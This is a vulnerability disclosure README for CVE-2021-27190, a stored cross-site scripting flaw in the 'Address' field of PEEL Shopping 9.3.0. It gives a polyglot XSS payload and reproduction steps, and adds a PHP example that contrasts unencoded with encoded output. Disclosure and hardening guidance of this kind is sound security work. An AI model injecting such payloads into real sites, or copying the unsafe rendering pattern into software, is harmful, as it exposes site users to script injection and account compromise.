anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS


CVE-2021-27190 - PEEL Shopping, eCommerce shopping cart - Stored Cross-Site Scripting Vulnerability in 'Address'

Watch the video

Date

2021-02-11

Exploit Author

Anmol K Sachan

Vendor Homepage

https://www.peel.fr/

Software Link

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

Vulnerable Software Link

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

Software

PEEL SHOPPING 9.3.0

Vulnerability Type

Stored Cross-site Scripting

Vulnerability

Stored XSS

Tested on Windows 10 XAMPP


CVE Assigned

CVE-2021-27190

This application is vulnerable to stored XSS.

Vulnerable script

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

Vulnerable parameters

'Address'

Payload used

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view

On the same page where the payload was injected, click the text box to edit the address.
The stored JavaScript (XSS) then executes.
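
How output encoding closes this class of bug, shown as an added PHP example that is not part of the original README and is not PEEL Shopping's code. The function names, the `address` field name and the textarea markup are assumptions, and the sample value is constructed.

```php
<?php
// Added illustration only: hypothetical helpers, not PEEL Shopping source.

// Vulnerable pattern: the stored value is written back into the edit form
// unencoded, so markup inside it is parsed by the browser as HTML.
function render_address_field_unsafe(string $address): string
{
    return '<textarea name="address">' . $address . '</textarea>';
}

// Hardened pattern: encode at output time for the HTML context.
// ENT_QUOTES also covers the case where the value lands inside an
// attribute (for example value="..."), where a quote would otherwise
// let an event handler attribute be appended.
function render_address_field_safe(string $address): string
{
    $encoded = htmlspecialchars($address, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<textarea name="address">' . $encoded . '</textarea>';
}

// Defence in depth on input: accept only characters a postal address
// needs (assumed allow-list; adjust for the locales actually served).
function is_plausible_address(string $address): bool
{
    return preg_match('/^[\p{L}\p{N} .,\'#\/-]{1,255}$/u', $address) === 1;
}

// Constructed sample values (not taken from the application's database).
$benign = "12 Rue de l'Exemple, 75001 Paris";
$hostile = '12 Rue Example</textarea><svg onload=alert()>';

foreach ([$benign, $hostile] as $stored) {
    echo 'accepted by validation: ', var_export(is_plausible_address($stored), true), PHP_EOL;
    echo 'unsafe render: ', render_address_field_unsafe($stored), PHP_EOL;
    echo 'safe render:   ', render_address_field_safe($stored), PHP_EOL, PHP_EOL;
}
```

Encoding at output is the control that matters here; the input allow-list only reduces what can reach storage and does not replace it.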

References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190
